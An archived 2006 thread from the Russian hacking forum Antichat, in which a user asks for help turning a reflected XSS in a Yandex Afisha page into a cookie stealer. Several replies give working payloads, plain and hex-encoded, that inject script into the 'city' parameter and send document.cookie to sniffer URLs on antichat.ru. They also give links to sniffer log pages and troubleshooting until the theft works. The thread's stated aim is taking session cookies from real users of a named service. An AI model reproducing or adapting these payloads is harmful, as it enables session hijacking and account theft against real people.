Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Xss на яндексе... Требуеца помощь (https://forum.antichat.xyz/showthread.php?t=29335)

IDentety 18.12.2006 02:35
Xss на яндексе... Требуеца помощь
 
PHP код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E 
Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!


Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать :)

GreenBear 18.12.2006 02:39
http://forum.antichat.ru/thread19610.html

IDentety 18.12.2006 03:42
Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...

KPOT_f!nd 18.12.2006 04:34
Цитата:
Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...
ЗА чем тебе писать или искать скрипт, просто на форуме есть тема где их выкладывают!

IDentety 18.12.2006 04:50
да я имею ввиду применение скрипта. ну допустим мне нада составить его так чтобы он таскал куки на мой снифер на античате. приведите мне пример на этой xss.

IDentety 18.12.2006 05:07
вобщем даже вот в чем суть вопроса- помогите составить корректный запрос чтобы с этого адреса куки уходили на сниффер...

Retscan 18.12.2006 07:21
Цитата:
Сообщение от IDentety
PHP код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E 
Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!


Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать :)
На, лови:
Код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;></script%3E
Плюс не забудь ;)

Constantine 18.12.2006 10:10
Можешь соорудить что нибудь этакое
<script>document.location="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie</script>

IDentety 18.12.2006 10:33
вот соорудил я конструкцию такого вида

http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript %20src=%22http://antichat.ru/s/мойсниф.jpg?%22+document.cookie;%3E%3C/script%3E

но отчеты не приходят.. видно гдето абшибся

Constantine 18.12.2006 10:40
Тык неправельно ты адрес задал, надо не ../s/yoursniff.jpg а .../cgi-bin/yoursnif.jpg

IDentety 18.12.2006 19:54
аха.. вижу.. значит правим http://antichat.ru/s/мойсниф.jpg на http://antichat.ru/cgi-bin/мойсниф.jpg и все должно пойти?

Ch3ck 18.12.2006 20:22
_http://antichat.ru/cgi-bin/s.jpg
Вот это поставь и всё.

IDentety 18.12.2006 20:33
хм всеравно кукы на античатовский сниффер не лезут.... Ничего не понимаю.... чеж за фигнято.. =((

DimOnOID 18.12.2006 21:11
СмоРи и Юзай... ;)

Код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
ВообЩем кто не понял... заходим к примеру на http://ha.ckers.org/xss.html
там в самон низу есть
Character Encoding Calculator
ASCII Text:
значит сюда вбиваем "><script>img = new Image(); img.src = "http://site/ваш_сниф.gif?"+document.cookie;</script>
и жМЁм Encode и получаем в строке Hex Value: наШу хренотень..и вставляем куда надо..

аВось кто ПлюсиК поставит...

*D1VER 18.12.2006 21:48
Цитата:
Сообщение от IDentety
хм всеравно кукы на античатовский сниффер не лезут.... Ничего не понимаю.... чеж за фигнято.. =((
На вот проверь этот сниф!
ССылка на него:
http://antichat.ru/s/lol.gif

А логи посмотришь здесь!
http://antichat.ru/s/lol/log.php?

Я проверял !работает!
Но пользуйся аккуратно он чужой! ))

IDentety 19.12.2006 10:25
Все ок.. Видимо чтото я при создании сниффера накосячил... Всем кто помогал + к репе... Спасибо парни

censored! 19.12.2006 14:15
Или так:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city="><script>img=n ew%20Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"%2Bdocument.cookie</script>

Лог смотри тут:
http://antichat.ru/sniff/log.php
---
Там плюс вырезался.


Время: 11:58